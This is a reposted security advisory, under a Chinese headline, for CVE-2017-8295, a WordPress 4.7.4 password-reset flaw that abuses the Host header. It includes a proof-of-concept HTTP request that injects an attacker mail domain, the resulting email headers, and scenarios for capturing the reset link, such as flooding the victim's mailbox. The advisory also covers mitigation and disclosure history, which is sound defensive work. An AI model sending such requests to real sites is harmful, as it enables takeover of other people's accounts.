wordpress最新版4.7.4再爆0day漏洞,可直接重置登录密码

=============================================

  • Discovered by: Dawid Golunski
  • dawid[at]legalhackers.com
  • https://legalhackers.com

  • CVE-2017-8295

  • Release date: 03.05.2017
  • Revision 1.0

- Severity: Medium/High

I. VULNERABILITY

WordPress Core <= 4.7.4 Potential Unauthorized Password Reset (0day)

II. BACKGROUND

"WordPress is a free and open-source content management system
(CMS) based on PHP and MySQL.

WordPress was used by more than 27.5% of the top 10 million
websites as of February 2017. WordPress is reportedly the
most popular website management or blogging system in
use on the Web, supporting more than 60 million websites."

https://en.wikipedia.org/wiki/WordPress

III. INTRODUCTION

Wordpress has a password reset feature that contains a vulnerability which
might in some cases allow attackers to get hold of the password reset link
without previous authentication.
Such attack could lead to an attacker gaining unauthorised access to a
victim's WordPress account.

IV. DESCRIPTION

The vulnerability stems from WordPress using untrusted data by default
when creating a password reset e-mail that is supposed to be delivered only
to the e-mail associated with the owner's account.

This can be observed in the following code snippet that creates a From
email header before calling a PHP mail() function:

------[ wp-includes/pluggable.php ]------


if ( !isset( $from_email ) ) { // Get the site domain and get rid of www. $sitename = strtolower( $_SERVER['SERVER_NAME'] ); if ( substr( $sitename, 0, 4 ) == 'www.' ) { $sitename = substr( $sitename, 4 ); } $from_email = 'wordpress@' . $sitename; }

As we can see, Wordpress is using SERVER_NAME variable to get the hostname of
the server in order to create a From/Return-Path header of the outgoing password
reset email.
However, major web servers such as Apache by default set the SERVER_NAME variable
using the hostname supplied by the client (within the HTTP_HOST header):

https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname

Because SERVER_NAME can be modified, an attacker could set it to an arbitrary
domain of his choice e.g:

attackers-mxserver.com

which would result in Wordpress setting the $from_email to

wordpress@attackers-mxserver.com

and thus result in an outgoing email with From/Return-Path set to this
malicious address.

As to which e-mail header the attacker would be able to modify - From or
Return-Path, it depends on the server environment. As can be read on
http://php.net/manual/en/function.mail.php
The From header sets also Return-Path under Windows.

Depending on the configuration of the mail server, it may result in
an email that gets sent to the victim WordPress user with
such malicious From/Return-Path address set in the email headers.

This could possibly allow the attacker to intercept the email containing the
password reset link in some cases requiring user interaction as well as without
user interaction.

Some example scenarios include:

  • If attacker knows the email address of the victim user. They can perform a prior
    DoS attack on the victim's email account (e.g by sending multiple
    large files to exceed user's disk quota, or attacking the DNS server) in order to
    cause the password reset email to be rejected by the receiving server, or not
    reach the destination and thus get returned to the account on attacker's server

  • Some autoresponders might attach a copy of the email sent in the body of the
    auto-replied message

  • Sending multiple password reset emails to force the user to reply to the
    message to enquiry explanation for endless password reset emails.
    The reply containing the password link would then be sent to attacker.

etc.

V. PROOF OF CONCEPT

If an attacker sends a request similar to the one below to a default Wordpress
installation that is accessible by the IP address (IP-based vhost):

-----[ HTTP Request ]----

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

user_login=admin&redirect_to=&wp-submit=Get+New+Password


Wordpress will trigger the password reset function for the admin user account.

Because of the modified HOST header, the SERVER_NAME will be set to
the hostname of attacker's choice.
As a result, Wordpress will pass the following headers and email body to the
/usr/bin/sendmail wrapper:

------[ resulting e-mail ]-----

Subject: [CompanyX WP] Password Reset
Return-Path: wordpress@attackers-mxserver.com
From: WordPress wordpress@attackers-mxserver.com
Message-ID: e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com
X-Priority: 3
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Someone requested that the password be reset for the following account:

http://companyX-wp/wp/wordpress/

Username: admin

If this was a mistake, just ignore this email and nothing will happen.

To reset your password, visit the following address:

http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin


As we can see, fields Return-Path, From, and Message-ID, all have the attacker's
domain set.

The verification of the headers can be performed by replacing /usr/sbin/sendmail with a
bash script of:

!/bin/bash

cat > /tmp/outgoing-email

VI. BUSINESS IMPACT

Upon a successfull exploitation, attacker may be able to reset user's password
and gain unauthorized access to their WordPress account.

VII. SYSTEMS AFFECTED

All WordPress versions up to the latest 4.7.4

VIII. SOLUTION

No official solution available. As a temporary solution users can enable
UseCanonicalName to enforce static SERVER_NAME value

https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname

This issue was first reported to WordPress security team multiple times,
with the first report sent in July 2016.

As there has been no progress in this case , this advisory is finally
released to the public without an official patch.

IX. REFERENCES

https://legalhackers.com

https://ExploitBox.io

Vendor site:
https://wordpress.org

http://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname

http://php.net/manual/en/function.mail.php

https://tools.ietf.org/html/rfc5321

X. CREDITS

Discovered by

Dawid Golunski
dawid (at) legalhackers (dot) com

https://legalhackers.com
https://ExploitBox.io

Thanks to BeyondSecurity for help with contacting the vendor.

XI. REVISION HISTORY

03.05.2017 - Advisory released, rev. 1

XII. LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.

原文链接:https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html


版权声明:未经书面授权禁止转载、摘编、复制或建立镜像。对既成事实本站将保留所有的权利。